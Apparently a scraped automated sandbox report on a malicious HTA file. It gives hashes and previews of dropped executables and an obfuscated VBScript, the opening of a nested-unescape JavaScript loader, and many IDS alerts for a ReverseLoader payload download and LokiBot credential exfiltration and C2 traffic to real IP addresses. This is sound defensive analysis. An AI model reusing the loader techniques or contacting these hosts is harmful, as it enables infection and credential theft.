                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V.7g...........!.................#... ...@....... ....................................@.................................`#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~...... ...#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................7.0.....|.....|.......................................... >.....P ......P.........V.....b.....e.....i.....s...P.....P...!.P.....P.......!.....*.......>.......................................'..........<Module>.dn
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (446), with CRLF, CR line terminators
                                                                                                              Category:modified
                                                                                                              Size (bytes):867
                                                                                                              Entropy (8bit):5.2860256635826826
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:KJBqd3ka6KRfNEif8Kax5DqBVKVrdFAMBJTH:Cika6CNEu8K2DcVKdBJj
                                                                                                              MD5:EC4E61FF3FB9FB55B71A3A86C99C4165
                                                                                                              SHA1:FAAE4E14A1A4DED69692C7FB6916398C27E5F618
                                                                                                              SHA-256:2D962113E6D53A550281083D406D44A6D6773E599F69F026A0D97BADE22B0D93
                                                                                                              SHA-512:6D8C08816AA59B15024C88071A2D4B1BC9B41B8D9DB268B3EE6ADE543FAC77BFE01B46C9C538E2B3511E0D37B67A71A07C5CD9EB2C7C7ADA04F57C61772F5F70
                                                                                                              Malicious:false
                                                                                                              Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                              File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):56368
                                                                                                              Entropy (8bit):6.120994357619221
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:fF9E8FLLs2Zokf85d9PTV6Iq8Fnqf7P+WxqWKnz8DH:ffE6EkfOd9PT86dWvKgb
                                                                                                              MD5:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                                                                                                              SHA1:19DFD86294C4A525BA21C6AF77681B2A9BBECB55
                                                                                                              SHA-256:99A2C778C9A6486639D0AFF1A7D2D494C2B0DC4C7913EBCB7BFEA50A2F1D0B09
                                                                                                              SHA-512:94F0ACE37CAE77BE9935CF4FC8AAA94691343D3B38DE5E16C663B902C220BFF513CD02256C7AF2D815A23DD30439582DDBB0880009C76BBF36FF8FBC1A6DDC18
                                                                                                              Malicious:false
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: invoice727282_PDF..exe, Detection: malicious, Browse
                                                                                                              • Filename: #U0410#U0433#U0440#U043e-#U0410#U043b#U044c#U044f#U043d#U0441_(PO_460387320)_pdf.vbs, Detection: malicious, Browse
                                                                                                              • Filename: 6038732).vbs, Detection: malicious, Browse
                                                                                                              • Filename: cirby0J3LP.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, Detection: malicious, Browse
                                                                                                              • Filename: 3vj5tYFb6a.exe, Detection: malicious, Browse
                                                                                                              • Filename: 50000PCSPIC12F1501-ESN.exe, Detection: malicious, Browse
                                                                                                              • Filename: SecuriteInfo.com.Win32.KeyloggerX-gen.6339.24340.exe, Detection: malicious, Browse
                                                                                                              • Filename: Jdxvyx.exe, Detection: malicious, Browse
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...A>.]..............0................. ........@.. ....................................`.................................t...O.......................0B..........<................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......t3..pc.............X...<........................................0..........s.....Y.....(.....Z.....&..(......+....(....o......r...p(....-..r...p(....,.....X....i2..-;(....(..........%.r!..p.(....(....((...(....(....(....( .....-.(7...(.....*.(....-..*.~S...-.~R....S...s!.....~W...o"....~U...o#....~V...o$....o%...~Y...o&...~S...~Q...~T....s'....P...~P...sE...o(............~W....@_,s.....()...r7..p.$(*........o+..........o,....2....... ....37(....(8.........%...o-....
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                              File Type:very short file (no magic)
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1
                                                                                                              Entropy (8bit):0.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:U:U
                                                                                                              MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                              Malicious:false
                                                                                                              Preview:1
                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):46
                                                                                                              Entropy (8bit):1.0424600748477153
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:/lbq:4
                                                                                                              MD5:8CB7B7F28464C3FCBAE8A10C46204572
                                                                                                              SHA1:767FE80969EC2E67F54CC1B6D383C76E7859E2DE
                                                                                                              SHA-256:ED5E3DCEB0A1D68803745084985051C1ED41E11AC611DF8600B1A471F3752E96
                                                                                                              SHA-512:9BA84225FDB6C0FD69AD99B69824EC5B8D2B8FD3BB4610576DB4AD79ADF381F7F82C4C9522EC89F7171907577FAF1B4E70B82364F516CF8BBFED99D2ADEA43AF
                                                                                                              Malicious:false
                                                                                                              Preview:........................................user.
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with very long lines (381), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):143380
                                                                                                              Entropy (8bit):3.6712104367027116
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3072:WKjHhIZg8X9/CZUN6RRj09RrXaTGZ8tE6cORoG73St8gt5peRyMyr0+EnGGwm:fN8X9/CGIRR2Ro
                                                                                                              MD5:7450B95AC8FA59E12E46A4C2A6CF36ED
                                                                                                              SHA1:F1E5EC3ACDD59283CCAF7611F572CCBBD4009B63
                                                                                                              SHA-256:12A0A30BF86B8A8EB35E4309A523FAF7673C467DC623F3CFB09FCD45FC4FC139
                                                                                                              SHA-512:951B71EDDD8C390E9BB37585F8865E7E7343A967A62321EDD74B06D9474DF3F0C8C5440A91E96D672D5369B181828C655F28D233F5E3A5FB6945C48EF808B754
                                                                                                              Malicious:true
                                                                                                              Preview:..........F.u.n.c.t.i.o.n. .s.o.n.a.n.t.e.(.B.y.V.a.l. .p.i.o.c.a.m.e.c.r.a.n.s.,. .B.y.V.a.l. .x.a.n.t.e.l.o.m.a.,. .B.y.V.a.l. .r.e.c.a.t.a.d.a.m.e.n.t.e.)..... . . . .D.i.m. .p.i.r.o.s.e..... . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . ..... . . . .D.o. .W.h.i.l.e. .p.i.r.o.s.e. .>. .0..... . . . . . . . .p.i.o.c.a.m.e.c.r.a.n.s. .=. .L.e.f.t.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .-. .1.). .&. .r.e.c.a.t.a.d.a.m.e.n.t.e. .&. .M.i.d.(.p.i.o.c.a.m.e.c.r.a.n.s.,. .p.i.r.o.s.e. .+. .L.e.n.(.x.a.n.t.e.l.o.m.a.).)..... . . . . . . . .p.i.r.o.s.e. .=. .I.n.S.t.r.(.p.i.r.o.s.e. .+. .L.e.n.(.r.e.c.a.t.a.d.a.m.e.n.t.e.).,. .p.i.o.c.a.m.e.c.r.a.n.s.,. .x.a.n.t.e.l.o.m.a.)..... . . . .L.o.o.p..... . . . ..... . . . .s.o.n.a.n.t.e. .=. .p.i.o.c.a.m.e.c.r.a.n.s.....E.n.d. .F.u.n.c.t.i.o.n.............p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .R.e.a.d.S.t.d.I.n.(.)..... . . . .w.h.i.l.e. .N.o.t. .s.t.d.I.n...A.t.E.n.d.O.f.S.t.r.e.a.m..... . . . . . .
                                                                                                              File type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                              Entropy (8bit):2.346528603865231
                                                                                                              TrID:
                                                                                                                File name:bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta
                                                                                                                File size:182'548 bytes
                                                                                                                MD5:5476ba599869d81abee08f38f1c1a1d9
                                                                                                                SHA1:46748779ec123145fdf90942c9df65d0099c9a99
                                                                                                                SHA256:ec97b59bc0398eb50eb842046e017755dbbc8d6764a6c26db85cd90853760669
                                                                                                                SHA512:516531534bee5995295659464f480c6d12909668fdb623c0c02dd93c9055df7bb203833e4e84416b31ef923dff8057f76f0e850bb84c53096cac43cdf2d04edd
                                                                                                                SSDEEP:96:4vCl172Xu01IhxXYcQu01IhPXYZxd7b2+sMdHeu01IhLu01Ih5XY4u01Iht5Q:4vCldarG1QrGsx92+KrGLrGZrGLQ
                                                                                                                TLSH:97048E95DA3498C8BBCD4CA77EFC778D79B8935F56DA2D81831B3000EC2939CA48051E
                                                                                                                File Content Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253Cscript%25253E%25250A%25253C%252521--%25250Adocument.write%252528unescape%252528%25252
                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                2024-11-15T18:14:04.339237+01002858295ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)1192.3.243.13680192.168.2.449738TCP
                                                                                                                2024-11-15T18:14:06.302119+01002858795ETPRO MALWARE ReverseLoader Payload Request (GET) M21192.168.2.449730192.3.243.13680TCP
                                                                                                                2024-11-15T18:14:28.588137+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44973994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:28.588137+01002025381ET MALWARE LokiBot Checkin1192.168.2.44973994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:28.588137+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44973994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:29.539079+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44973994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:29.696597+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:29.696597+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:29.696597+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:30.675330+01002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.44974094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:30.795104+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:30.795104+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:30.795104+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:31.757247+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:31.757247+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:31.762597+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449741TCP
                                                                                                                2024-11-15T18:14:31.919895+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:31.919895+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:31.919895+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:32.891366+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:32.891366+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:32.896680+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449742TCP
                                                                                                                2024-11-15T18:14:33.059121+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:33.059121+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:33.059121+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:34.034011+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:34.034011+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:34.039378+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449743TCP
                                                                                                                2024-11-15T18:14:34.179211+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:34.179211+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:34.179211+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:35.159054+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:35.159054+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:35.164579+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449744TCP
                                                                                                                2024-11-15T18:14:35.327062+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:35.327062+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:35.327062+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:36.284393+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:36.284393+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:36.290489+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449745TCP
                                                                                                                2024-11-15T18:14:36.470587+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:36.470587+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:36.470587+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:37.443015+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:37.443015+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:37.448794+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449746TCP
                                                                                                                2024-11-15T18:14:37.613187+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:37.613187+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:37.613187+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:38.600814+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:38.600814+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:38.608490+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449747TCP
                                                                                                                2024-11-15T18:14:38.767433+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:38.767433+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:38.767433+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:39.761618+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:39.761618+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:39.766951+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449748TCP
                                                                                                                2024-11-15T18:14:39.915789+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44974994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:39.915789+01002025381ET MALWARE LokiBot Checkin1192.168.2.44974994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:39.915789+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44974994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:40.866807+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44974994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:40.866807+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44974994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:40.872268+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449749TCP
                                                                                                                2024-11-15T18:14:41.021819+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:41.021819+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:41.021819+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:42.016291+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:42.016291+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:42.021787+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449750TCP
                                                                                                                2024-11-15T18:14:42.169695+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:42.169695+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:42.169695+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:43.119045+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:43.119045+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:43.124310+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449751TCP
                                                                                                                2024-11-15T18:14:43.295006+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:43.295006+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:43.295006+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:44.288553+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:44.288553+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975294.156.177.9580TCP
                                                                                                                2024-11-15T18:14:44.294140+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449752TCP
                                                                                                                2024-11-15T18:14:44.446888+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:44.446888+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:44.446888+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:45.436270+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:45.436270+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975394.156.177.9580TCP
                                                                                                                2024-11-15T18:14:45.441546+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449753TCP
                                                                                                                2024-11-15T18:14:45.590810+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:45.590810+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:45.590810+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:46.563404+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:46.563404+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975494.156.177.9580TCP
                                                                                                                2024-11-15T18:14:46.568842+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449754TCP
                                                                                                                2024-11-15T18:14:46.714498+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:46.714498+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:46.714498+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:47.661088+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:47.661088+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975594.156.177.9580TCP
                                                                                                                2024-11-15T18:14:47.666396+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449755TCP
                                                                                                                2024-11-15T18:14:47.882051+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:47.882051+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:47.882051+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:48.863645+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:48.863645+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975694.156.177.9580TCP
                                                                                                                2024-11-15T18:14:48.868839+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449756TCP
                                                                                                                2024-11-15T18:14:49.034112+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:49.034112+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:49.034112+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:49.974935+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:49.974935+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975794.156.177.9580TCP
                                                                                                                2024-11-15T18:14:49.980312+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449757TCP
                                                                                                                2024-11-15T18:14:50.182971+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:50.182971+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:50.182971+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:51.170948+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:51.170948+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975894.156.177.9580TCP
                                                                                                                2024-11-15T18:14:51.176298+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449758TCP
                                                                                                                2024-11-15T18:14:51.319509+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44975994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:51.319509+01002025381ET MALWARE LokiBot Checkin1192.168.2.44975994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:51.319509+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44975994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:52.291246+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44975994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:52.291246+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44975994.156.177.9580TCP
                                                                                                                2024-11-15T18:14:52.296733+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449759TCP
                                                                                                                2024-11-15T18:14:52.454053+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:52.454053+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:52.454053+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:53.435601+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:53.435601+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976094.156.177.9580TCP
                                                                                                                2024-11-15T18:14:53.441225+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.449760TCP
                                                                                                                2024-11-15T18:14:53.594421+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.44976194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:53.594421+01002025381ET MALWARE LokiBot Checkin1192.168.2.44976194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:53.594421+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.44976194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:54.533464+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.44976194.156.177.9580TCP
                                                                                                                2024-11-15T18:14:54.533464+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.44976194.156.177.9580TCP
